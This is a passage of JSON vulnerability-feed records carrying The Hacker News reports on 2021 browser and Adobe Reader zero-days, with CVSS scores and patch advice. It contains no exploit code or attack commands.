"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-12T05:41:00", "type": "thn", "title": "Alert: Hackers Exploit Adobe Reader 0-Day Vulnerability in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21101", "CVE-2021-21105", "CVE-2021-28550"], "modified": "2021-05-12T06:42:13", "id": "THN:8243BE07E124CAD984B8B4895550A7CC", "href": "https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:19", "description": "[![](https://thehackernews.com/images/-wb_mRqoRlJs/YH_fh-jU73I/AAAAAAAACUg/PjdPBbIeXIQL_vuc_D3kAe7us4v9piwdwCLcBGAsYHQ/s0/chrome-update.jpg)](<https://thehackernews.com/images/-wb_mRqoRlJs/YH_fh-jU73I/AAAAAAAACUg/PjdPBbIeXIQL_vuc_D3kAe7us4v9piwdwCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Tuesday released an update for Chrome web browser for Windows, Mac, and Linux, with a total of seven security fixes, including one flaw for which it says an exploit exists in the wild.\n\nTracked as **CVE-2021-21224**, the flaw concerns a type confusion vulnerability in V8 open-source JavaScript engine that was reported to the company by security researcher Jose Martinez on April 5\n\nAccording to security researcher [Lei Cao](<https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html#rca-of-issue-1195777>), the bug [[1195777](<https://bugs.chromium.org/p/chromium/issues/detail?id=1195777>)] is triggered when performing integer data type conversion, resulting in an out-of-bounds condition that could be used to achieve arbitrary memory read/write primitive.\n\n\"Google is aware of reports that exploits for CVE-2021-21224 exist in the wild,\" Chrome's Technical Program Manager Srinivas Sista [said](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>) in a blog post.\n\n[![](https://thehackernews.com/images/-MqsPXUEBIAs/YH_gSVGkWZI/AAAAAAAACUw/ZOCKPD3LhzYIiPehN7StsViTVlFaKHhyACLcBGAsYHQ/s0/chrome-code.jpg)](<https://thehackernews.com/images/-MqsPXUEBIAs/YH_gSVGkWZI/AAAAAAAACUw/ZOCKPD3LhzYIiPehN7StsViTVlFaKHhyACLcBGAsYHQ/s0/chrome-code.jpg>)\n\nThe update comes after proof-of-concept (PoC) [code](<https://noahblog.360.cn/chromium_v8_remote_code_execution_vulnerability_analysis/>) exploiting the flaw published by a researcher named \"[frust](<https://twitter.com/frust93717815/status/1382301769577861123>)\" emerged on April 14 by taking advantage of the fact that the issue was addressed in the [V8 source code](<https://chromium-review.googlesource.com/c/v8/v8/+/2826114/3/src/compiler/representation-change.cc>), but the patch was not integrated into the Chromium codebase and all the browsers that rely on it, such as Chrome, Microsoft Edge, Brave, Vivaldi, and Opera.\n\nThe one-week patch gap meant the browsers were vulnerable to attacks until the patches posted in the open-source code repository were released as a stable update.\n\nIt's worth noting that Google [halved](<https://groups.google.com/a/chromium.org/g/security-dev/c/fbiuFbW07vI>) the median \"patch gap\" from 33 days in Chrome 76 to 15 days in Chrome 78, which was released in October 2019, thereby pushing severe security fixes every two weeks.\n\nThe latest set of fixes also arrive close on the heels of an update the search giant rolled out [last week](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) with [patches for two security vulnerabilities](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) CVE-2021-21206 and CVE-2021-21220, the latter of which was demonstrated at the Pwn2Own [2021 hacking](<https://thehackernews.com/hacker/>) contest earlier this month.\n\nChrome 90.0.4430.85 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-21T08:20:00", "type": "thn", "title": "Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224"], "modified": "2021-04-21T08:30:40", "id": "THN:FF8DAEC0AE0DDAE827D57407C51BE992", "href": "https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![iOS, Chrome, IE Zero-Day Flaws](https://thehackernews.com/images/-xmPJ5TMTpac/YO_wfpf1LkI/AAAAAAAADM4/xSKsZYAbLBYJjYvNQilqUM9z0lf0Rx7_gCLcBGAsYHQ/s728-e1000/chrome.jpg)](<https://thehackernews.com/images/-xmPJ5TMTpac/YO_wfpf1LkI/AAAAAAAADM4/xSKsZYAbLBYJjYvNQilqUM9z0lf0Rx7_gCLcBGAsYHQ/s0/chrome.jpg>)\n\nThreat intelligence researchers from Google on Wednesday [shed more light](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) on four in-the-wild zero-days in Chrome, Safari, and Internet Explorer browsers that were exploited by malicious actors in different campaigns since the start of the year.\n\nWhat's more, three of the four zero-days were engineered by commercial providers and sold to and used by government-backed actors, contributing to an uptick in real-world attacks. The list of now-patched vulnerabilities is as follows -\n\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>): Use-After-Free in QuickTimePluginReplacement (Apple WebKit)\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>): Chrome Object Lifecycle Issue in Audio\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>): Chrome Type Confusion in V8\n * [**CVE-2021-33742**](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>): Internet Explorer out-of-bounds write in MSHTML\n\nBoth Chrome zero-days \u2014 CVE-2021-21166 and CVE-2021-30551 \u2014 are believed to have been used by the same actor, and were delivered as one-time links sent via email to targets located in Armenia, with the links redirecting unsuspecting users to attacker-controlled domains that masqueraded as legitimate websites of interest to the recipients.\n\nThe malicious websites took charge of fingerprinting the devices, including collecting system information about the clients, before delivering a second-stage payload.\n\nWhen Google rolled out a patch for CVE-2021-30551, Shane Huntley, Director of Google's Threat Analysis Group (TAG), revealed that the vulnerability was leveraged by the same actor that abused CVE-2021-33742, an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its [Patch Tuesday update](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) on June 8.\n\nThe two zero-days were provided by a commercial exploit broker to a nation-state adversary, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley previously added.\n\n[![](https://thehackernews.com/images/--ol-CfJ3-bE/YO_tDkpfuNI/AAAAAAAADMw/bonGU0wpX_QzAsMNe5_Eh_0_Nb4OAma_QCLcBGAsYHQ/s0/zero-day.jpg)](<https://thehackernews.com/images/--ol-CfJ3-bE/YO_tDkpfuNI/AAAAAAAADMw/bonGU0wpX_QzAsMNe5_Eh_0_Nb4OAma_QCLcBGAsYHQ/s0/zero-day.jpg>)\n\nNow according to a technical report published by the team, all the three zero-days were \"developed by the same commercial surveillance company that sold these capabilities to two different government-backed actors,\" adding the Internet Explorer flaw was used in a campaign targeting Armenian users with malicious Office documents that loaded web content within the web browser.\n\nGoogle did not disclose the identities of the exploit broker or the two threat actors that used the vulnerabilities as part of their attacks.\n\n## SolarWinds Hackers Exploited iOS Zero-Day\n\nThe Safari zero-day, in contrast, concerned a WebKit flaw that could enable adversaries to process maliciously crafted web content that may result in universal cross-site scripting attacks. The issue was rectified by Apple on March 26, 2021.\n\nAttacks leveraging CVE-2021-1879, which Google attributed to a \"likely Russian government-backed actor,\" were executed by means of sending malicious links to government officials over LinkedIn that, when clicked from an iOS device, redirected the user to a rogue domain that served the next-stage payloads.\n\nIt's worth noting that the offensive also mirrors a [wave of targeted attacks](<https://thehackernews.com/2021/05/solarwinds-hackers-target-think-tanks.html>) unleashed by Russian hackers tracked as Nobelium, which was found abusing the vulnerability to strike government agencies, think tanks, consultants, and non-governmental organizations as part of an email phishing campaign.\n\nNobelium, a threat actor linked to the Russian Foreign Intelligence Service (SVR), is also suspected of orchestrating the [SolarWinds supply chain attack](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>) late last year. It's known by other aliases such as APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).\n\n\"Halfway into 2021, there have been [33 zero-day exploits](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>) used in attacks that have been publicly disclosed this year \u2014 11 more than the total number from 2020,\" TAG researchers Maddie Stone and Clement Lecigne noted. \"While there is an increase in the number of zero-day exploits being used, we believe greater detection and disclosure efforts are also contributing to the upward trend.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-15T08:25:00", "type": "thn", "title": "Google Details iOS, Chrome, IE Zero-Day Flaws Exploited Recently in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T12:45:33", "id": "THN:BBBFDA7EEE18F813A5DA572FD390D528", "href": "https://thehackernews.com/2021/07/google-details-ios-chrome-ie-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[![Chrome Browser](https://thehackernews.com/images/--Br-zb7NQb0/YPEUTqMvgsI/AAAAAAAADNw/cesEHjkHFKgyqC_MTP_ji5iUXUCeqoH1QCLcBGAsYHQ/s728-e1000/chrome-update.jpg)](<https://thehackernews.com/images/--Br-zb7NQb0/YPEUTqMvgsI/AAAAAAAADNw/cesEHjkHFKgyqC_MTP_ji5iUXUCeqoH1QCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle has pushed out a new security update to Chrome browser for Windows, Mac, and Linux with multiple fixes, including a zero-day that it says is being exploited in the wild.\n\nThe latest patch resolves a total of eight issues, one of which concerns a type confusion issue in its V8 open-source and JavaScript engine ([CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>)). The search giant credited an anonymous researcher for reporting the flaw on July 12.\n\nAs is usually the case with actively exploited flaws, the company issued a terse statement acknowledging that \"an exploit for CVE-2021-30563 exists in the wild\" while refraining from sharing full details about the underlying vulnerability used in the attacks due to its serious nature and the possibility that doing so could lead to further abuse.\n\nCVE-2021-30563 also marks the ninth zero-day addressed by Google to combat real-world attacks against Chrome users since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n\nChrome users are advised to update to the latest version (91.0.4472.164) by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T05:08:00", "type": "thn", "title": "Update Your Chrome Browser to Patch New Zero\u2011Day Bug Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563"], "modified": "2021-07-16T05:08:47", "id": "THN:C736174C6B0ADC38AA88BC58F30271DA", "href": "https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:19", "description": "[![Google Chrome](https://thehackernews.com/images/-FOgCdN3CSOk/YUAgGS1bB1I/AAAAAAAADyc/2oKkq_Mon1AnpsrRVosSNgmXm6ZdbQTXACLcBGAsYHQ/s728-e1000/chrome-update.jpg)](<https://thehackernews.com/images/-FOgCdN3CSOk/YUAgGS1bB1I/AAAAAAAADyc/2oKkq_Mon1AnpsrRVosSNgmXm6ZdbQTXACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Monday released security updates for Chrome web browser to address a total of 11 security issues, two of which it says are actively exploited zero-days in the wild.\n\nTracked as **CVE-2021-30632** and **CVE-2021-30633**, the [vulnerabilities](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) concern an out of bounds write in V8 JavaScript engine and a use after free flaw in Indexed DB API respectively, with the internet giant crediting anonymous researchers for reporting the bugs on September 8.\n\nAs is typically the case, the company said it's \"aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild\" without sharing additional specifics about how, when, and where the vulnerabilities were exploited, or the threat actors that may be abusing them.\n\nWith these two security shortcomings, Google has addressed a total of 11 zero-day vulnerabilities in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n\nChrome users are advised to update to the latest version (93.0.4577.82) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-14T04:08:00", "type": "thn", "title": "Update Google Chrome to Patch 2 New Zero-Day Flaws Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-19T08:13:46", "id": "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "href": "https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:16", "description": "[![Chrome web browser](https://thehackernews.com/images/-EBTuV2RF5wo/YU6_b4n3Y4I/AAAAAAAAD5w/Rv4cfNWgTzsitUR4O-m9Hoo5Jsb-IyxJACLcBGAsYHQ/s728-e1000/chrome-update.jpg)](<https://thehackernews.com/images/-EBTuV2RF5wo/YU6_b4n3Y4I/AAAAAAAAD5w/Rv4cfNWgTzsitUR4O-m9Hoo5Jsb-IyxJACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Friday rolled out an emergency security patch to its Chrome web browser to address a security flaw that's known to have an exploit in the wild.\n\nTracked as [CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>), the vulnerability has been described as [use after free](<https://cwe.mitre.org/data/definitions/416.html>) in [Portals API](<https://web.dev/hands-on-portals/>), a web page navigation system that enables a page to show another page as an inset and \"perform a seamless transition to a new state, where the formerly-inset page becomes the top-level document.\"\n\nCl\u00e9ment Lecigne of Google Threat Analysis Group (TAG) has been credited with reporting the flaw. Additional specifics pertaining to the weakness have not been disclosed in light of active exploitation and to allow a majority of the users to apply the patch, but the internet giant said it's \"aware that an exploit for CVE-2021-37973 exists in the wild.\"\n\nThe update arrives a day after Apple moved to close an actively exploited security hole in older versions of iOS and macOS ([CVE-2021-30869](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>)), which the TAG noted as being \"used in conjunction with a N-day remote code execution targeting WebKit.\" With the latest fix, Google has addressed a total of [12 zero-day flaws in Chrome](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) since the start of 2021:\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n\nChrome users are advised to update to the latest version (94.0.4606.61) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-25T06:39:00", "type": "thn", "title": "Urgent Chrome Update Released to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30869", "CVE-2021-37973"], "modified": "2021-09-27T04:38:24", "id": "THN:6A9CD6F085628D08978727C0FF597535", "href": "https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[![Google Chrome](https://thehackernews.com/new-images/img/a/AVvXsEggQTDQ-V9WbcSJKwsXKGeYWFxP3jSKikqYhYG8xpFa_NiB7aFJV8tcR11eRFpoq9nIOMlHfbefT2pZC9vdUHCul3SAafHr4t5T-oIIj-H61WEAlv8x9Mfzo1cqzuxor4bqF090P_C7w7fQqzoSFEmUVm1PvbmzU9YENMC2O_ZAEkOC_qbBbzYZdzhA=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEggQTDQ-V9WbcSJKwsXKGeYWFxP3jSKikqYhYG8xpFa_NiB7aFJV8tcR11eRFpoq9nIOMlHfbefT2pZC9vdUHCul3SAafHr4t5T-oIIj-H61WEAlv8x9Mfzo1cqzuxor4bqF090P_C7w7fQqzoSFEmUVm1PvbmzU9YENMC2O_ZAEkOC_qbBbzYZdzhA>)\n\nGoogle on Thursday pushed urgent security fixes for its Chrome browser, including a pair of new security weaknesses that the company said are being exploited in the wild, making them the fourth and fifth actively zero-days plugged this month alone.\n\nThe issues, designated as [CVE-2021-37975 and CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>), are part of a total of four patches, and concern a [use-after-free flaw](<https://cwe.mitre.org/data/definitions/416.html>) in V8 JavaScript and WebAssembly engine as well as an information leak in core.\n\nAs is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks so as to allow a majority of users to be updated with the patches, but noted that it's aware that \"exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild.\"\n\nAn anonymous researcher has been credited with reporting CVE-2021-37975. The discovery of CVE-2021-37976, on the other hand, involves Cl\u00e9ment Lecigne from Google Threat Analysis Group, who was also credited with [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>), another actively exploited use-after-free vulnerability in Chrome's Portals API that was reported last week, raising the possibility that the two flaws may have been stringed together as part of an exploit chain to execute arbitrary code.\n\nWith the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * 